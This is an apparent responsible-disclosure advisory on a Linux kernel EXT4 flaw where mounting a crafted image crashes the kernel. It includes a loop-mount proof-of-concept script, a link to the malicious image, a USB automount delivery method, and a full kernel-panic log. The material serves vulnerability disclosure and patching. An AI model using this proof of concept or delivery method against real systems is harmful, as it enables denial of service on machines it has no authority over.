OS-S Security Advisory 2016-22
Local DoS: Linux Kernel EXT4 Memory Corruption / SLAB-Out-of-Bounds Read
Date:
October 31th, 2016
Authors:
Sergej Schumilo, Ralf Spenneberg
CVE:
Not yet assigned
CVSS:
4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C)
Severity:
Critical
Ease of Exploitation:
Trivial
Vulnerability Type:
Memory Corruption / SLAB-Out-of-Bounds Read
Abstract:
Mounting a crafted EXT4 image read-only leads to a memory corruption and
SLAB-Out-of-Bounds Reads (according to KASAN).
Since the mounting procedure is a privileged operation, an attacker is
probably not able to trigger this vulnerability on the commandline.
Instead the automatic mounting feature of the GUI via a crafted
USB-device is required.
Detailed product description:
We have verified the bug on the following kernel builds:
Ubuntu Server 16.10 (GNU/Linux 4.8.0-22-generic x86_64)
RedHat Kernel 3.10.0-327.18.2.el7.x86_64
Vendor Communication:
We contacted RedHat on May, 03th 2016.
To this day, no security patch was provided by the vendor.
We publish this Security Advisory in accordance with our responsible
disclosure policy.
Reference: https://bugzilla.redhat.com/show_bug.cgi?id=1332503
Proof of Concept:
As a proof of concept, we are providing the image that is causing the
memory corruption / use-after-free. For demonstration purposes a script
to mount this filesystem is also attached.
Severity and Ease of Exploitation:
The vulnerability can be easily exploited as a Denial-of-Service
remotely by using a USB-device. In this case the attacker must copy this
image (e.g. using dd) to a device or storage such as a SD-card which can
be set to read-only mode (using the write-protection switch).
Mount-Script:
cp ext4_fs_file /tmp/
mkdir /tmp/a
losetup /dev/loop0 /tmp/ext4_fs_file
mount -o ro /dev/loop0 /tmp/a
Malicious EXT4-Image:
https://os-s.net/advisories/OSS-2016-22-image
KASAN-Report:
https://os-s.net/advisories/OSS-2016-22-KASAN
dmesg-Report:
/ # ./mount.sh
[ 56.421839] EXT4-fs (loop0): ext4_check_descriptors: Checksum for
group 0 failed (25303!=248)
[ 56.437702] BUG: unable to handle kernel paging request at
ffff880016161000
[ 56.446533] IP: [<ffffffffc005aa6f>]
ext4_calculate_overhead+0x29f/0x370 [ext4]
[ 56.454410] PGD 1fee067 PUD 1fef067 PMD 16160063 BAD
[ 56.461593] Oops: 000b [#1] SMP
[ 56.467235] Modules linked in: ext4(OE) mbcache(E) jbd2(E)
[ 56.476475] CPU: 0 PID: 145 Comm: mounter Tainted: G OE
4.6.0-rc6 #4
[ 56.486022] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996),
BIOS rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014
[ 56.503885] task: ffff88001ee33300 ti: ffff88001e850000 task.ti:
ffff88001e850000
[ 56.514936] RIP: 0010:[<ffffffffc005aa6f>] [<ffffffffc005aa6f>]
ext4_calculate_overhead+0x29f/0x370 [ext4]
[ 56.528848] RSP: 0018:ffff88001e853c38 EFLAGS: 00010297
[ 56.536256] RAX: 0000000032323200 RBX: ffff88001613c000 RCX:
0000000000000000
[ 56.546277] RDX: 0000000000128000 RSI: 0000000000128001 RDI:
0000000032323201
[ 56.556046] RBP: ffff88001e853c98 R08: ffff8800160b8400 R09:
0000000000000000
[ 56.565942] R10: ffff88001ee85000 R11: ffff88001ee84800 R12:
ffff88001ee85000
[ 56.575833] R13: 0000000000000005 R14: 0000000000000000 R15:
0000000000000000
[ 56.587260] FS: 00007fc4e7e6f700(0000) GS:ffff88001e400000(0000)
knlGS:0000000000000000
[ 56.597788] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 56.607823] CR2: ffff880016160b08 CR3: 000000000011b000 CR4:
00000000000006f0
[ 56.618769] Stack:
[ 56.622341] ffff88001ee85000 0000000000000000 0000000100000001
0000000000000000
[ 56.634376] 0000000000000001 ffff88001ee84800 0000000000001fff
0000000000000001
[ 56.645606] ffff8800160b8400 0000000000000000 ffff88001ee84800
ffff88001ee85000
[ 56.656883] Call Trace:
[ 56.660786] [<ffffffffc005c6c5>] ext4_fill_super+0x1b85/0x32c0 [ext4]
[ 56.669671] [<ffffffff81367579>] ? snprintf+0x39/0x40
[ 56.676400] [<ffffffff8120688b>] mount_bdev+0x17b/0x1b0
[ 56.682302] [<ffffffffc005ab40>] ?
ext4_calculate_overhead+0x370/0x370 [ext4]
[ 56.694070] [<ffffffffc004c935>] ext4_mount+0x15/0x20 [ext4]
[ 56.701554] [<ffffffff812071b8>] mount_fs+0x38/0x160
[ 56.708763] [<ffffffff811a6245>] ? __alloc_percpu+0x15/0x20
[ 56.717214] [<ffffffff81222847>] vfs_kern_mount+0x67/0x110
[ 56.723703] [<ffffffff81224fe8>] do_mount+0x228/0xdc0
[ 56.731254] [<ffffffff811e4e01>] ? __kmalloc_track_caller+0x31/0x220
[ 56.741002] [<ffffffff811a0ab2>] ? memdup_user+0x42/0x70
[ 56.748223] [<ffffffff81225ea5>] SyS_mount+0x95/0xe0
[ 56.756591] [<ffffffff817b6176>] entry_SYSCALL_64_fastpath+0x1e/0xa8
[ 56.766191] Code: 4c 89 5d c8 89 55 b4 e8 c0 60 fd ff 85 c0 4c 8b 5d
c8 0f 8e 46 ff ff ff 8b 55 b4 8d 3c 02 41 8b 4c 24 54 8d 72 01 d3 fa 48
63 d2 <48> 0f ab 13 39 fe 89 f2 75 e9 41 01 c5 e9 21 ff ff ff 49 8b 83
[ 56.800243] RIP [<ffffffffc005aa6f>]
ext4_calculate_overhead+0x29f/0x370 [ext4]
[ 56.811328] RSP <ffff88001e853c38>
[ 56.816875] CR2: ffff880016161000
[ 56.821488] ---[ end trace 70027566e5b28840 ]---
[ 56.826472] BUG: unable to handle kernel paging request at
ffff8800160b6100
[ 56.834290] IP: [<ffffffff810b4257>] task_tick_fair+0x4a7/0x980
[ 56.842839] PGD 1fee067 PUD 1fef067 PMD 16160063 BAD
[ 56.850310] Oops: 000b [#2] SMP
[ 56.856901] Modules linked in: ext4(OE) mbcache(E) jbd2(E)
[ 56.865616] CPU: 0 PID: 145 Comm: mounter Tainted: G D OE
4.6.0-rc6 #4
[ 56.875621] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996),
BIOS rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014
[ 56.892863] task: ffff88001ee33300 ti: ffff88001e850000 task.ti:
ffff88001e850000
[ 56.902648] RIP: 0010:[<ffffffff810b4257>] [<ffffffff810b4257>]
task_tick_fair+0x4a7/0x980
[ 56.914488] RSP: 0018:ffff88001e403dd0 EFLAGS: 00010002
[ 56.922043] RAX: fffffffffffffda2 RBX: ffff88001e87a000 RCX:
000000000000025e
[ 56.932215] RDX: 0000000000000019 RSI: ffff88001e416c40 RDI:
ffff8800160b6000
[ 56.940606] RBP: ffff88001e403e48 R08: ffffffffffffffff R09:
0000000000000001
[ 56.952012] R10: 0000000000000000 R11: 0000000000000001 R12:
0000000000005e99
[ 56.961436] R13: 00000000000000f0 R14: ffff88001ee33380 R15:
ffff88001e87a000
[ 56.968021] FS: 00007fc4e7e6f700(0000) GS:ffff88001e400000(0000)
knlGS:0000000000000000
[ 56.980306] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 56.987740] CR2: ffff8800161605b0 CR3: 000000000011b000 CR4:
00000000000006f0
[ 56.995946] Stack:
[ 56.997897] 0000000000000000 ffff88001ee33300 ffff88001e416c40
0000000000005eaa
[ 57.007230] ffff880000000000 0000000000000400 ffff880000000000
ffff88001e416c40
[ 57.017866] 000000001e403e30 ffff88001ee33380 ffff88001e416c40
0000000000016c40
[ 57.024945] Call Trace:
[ 57.027693] <IRQ>
[ 57.030393] [<ffffffff810a643c>] scheduler_tick+0x5c/0xd0
[ 57.036102] [<ffffffff810f5060>] ? tick_sched_handle.isra.13+0x60/0x60
[ 57.043808] [<ffffffff810e5be1>] update_process_times+0x51/0x60
[ 57.050493] [<ffffffff810f5025>] tick_sched_handle.isra.13+0x25/0x60
[ 57.058897] [<ffffffff810f509d>] tick_sched_timer+0x3d/0x70
[ 57.065082] [<ffffffff810e6464>] __hrtimer_run_queues+0xe4/0x250
[ 57.070516] [<ffffffff810e6bd8>] hrtimer_interrupt+0xa8/0x1a0
[ 57.077781] [<ffffffff8104f948>] local_apic_timer_interrupt+0x38/0x60
[ 57.083346] [<ffffffff817b89ed>] smp_apic_timer_interrupt+0x3d/0x50
[ 57.091424] [<ffffffff817b6d62>] apic_timer_interrupt+0x82/0x90
[ 57.099326] <EOI>
[ 57.102170] [<ffffffff81102911>] ? acct_collect+0x171/0x1a0
[ 57.109009] [<ffffffff8107eb4b>] do_exit+0x4db/0xb10
[ 57.115915] [<ffffffff8102fa93>] oops_end+0xa3/0xd0
[ 57.122250] [<ffffffff810666b0>] no_context+0x110/0x370
[ 57.129398] [<ffffffff81066991>] __bad_area_nosemaphore+0x81/0x200
[ 57.138090] [<ffffffff81066b24>] bad_area_nosemaphore+0x14/0x20
[ 57.146376] [<ffffffff81066ec0>] __do_page_fault+0xc0/0x4c0
[ 57.153429] [<ffffffff811e0015>] ? new_slab+0x3b5/0x5d0
[ 57.163147] [<ffffffff81067327>] trace_do_page_fault+0x37/0xd0
[ 57.169386] [<ffffffff8105fa99>] do_async_page_fault+0x19/0x70
[ 57.174572] [<ffffffff817b8118>] async_page_fault+0x28/0x30
[ 57.181017] [<ffffffffc005aa6f>] ?
ext4_calculate_overhead+0x29f/0x370 [ext4]
[ 57.188992] [<ffffffffc005aa50>] ?
ext4_calculate_overhead+0x280/0x370 [ext4]
[ 57.196489] [<ffffffffc005c6c5>] ext4_fill_super+0x1b85/0x32c0 [ext4]
[ 57.205539] [<ffffffff81367579>] ? snprintf+0x39/0x40
[ 57.211646] [<ffffffff8120688b>] mount_bdev+0x17b/0x1b0
[ 57.218941] [<ffffffffc005ab40>] ?
ext4_calculate_overhead+0x370/0x370 [ext4]
[ 57.228329] [<ffffffffc004c935>] ext4_mount+0x15/0x20 [ext4]
[ 57.234328] [<ffffffff812071b8>] mount_fs+0x38/0x160
[ 57.240946] [<ffffffff811a6245>] ? __alloc_percpu+0x15/0x20
[ 57.246275] [<ffffffff81222847>] vfs_kern_mount+0x67/0x110
[ 57.250890] [<ffffffff81224fe8>] do_mount+0x228/0xdc0
[ 57.255725] [<ffffffff811e4e01>] ? __kmalloc_track_caller+0x31/0x220
[ 57.261346] [<ffffffff811a0ab2>] ? memdup_user+0x42/0x70
[ 57.266554] [<ffffffff81225ea5>] SyS_mount+0x95/0xe0
[ 57.274193] [<ffffffff817b6176>] entry_SYSCALL_64_fastpath+0x1e/0xa8
[ 57.280765] Code: 8b bb e8 00 00 00 48 29 d0 48 81 ff 00 eb ee 81 74
2c 49 89 c0 48 c1 ea 06 49 c1 f8 3f 4c 89 c1 48 31 c1 4c 29 c1 48 39 d1
76 13 <3e> 48 01 87 00 01 00 00 48 8b 43 78 48 89 83 98 00 00 00 65 8b
[ 57.312620] RIP [<ffffffff810b4257>] task_tick_fair+0x4a7/0x980
[ 57.319317] RSP <ffff88001e403dd0>
[ 57.322494] CR2: ffff8800160b6100
[ 57.326972] ---[ end trace 70027566e5b28841 ]---
[ 57.333540] Kernel panic - not syncing: Fatal exception in interrupt
[ 57.346993] Kernel Offset: disabled
[ 57.350049] Rebooting in 1 seconds..
--
OpenSource Training Ralf Spenneberg http://www.os-t.de
Am Bahnhof 3-5 48565 Steinfurt Germany
Fon: +49(0)2552 638 755 Fax: +49(0)2552 638 757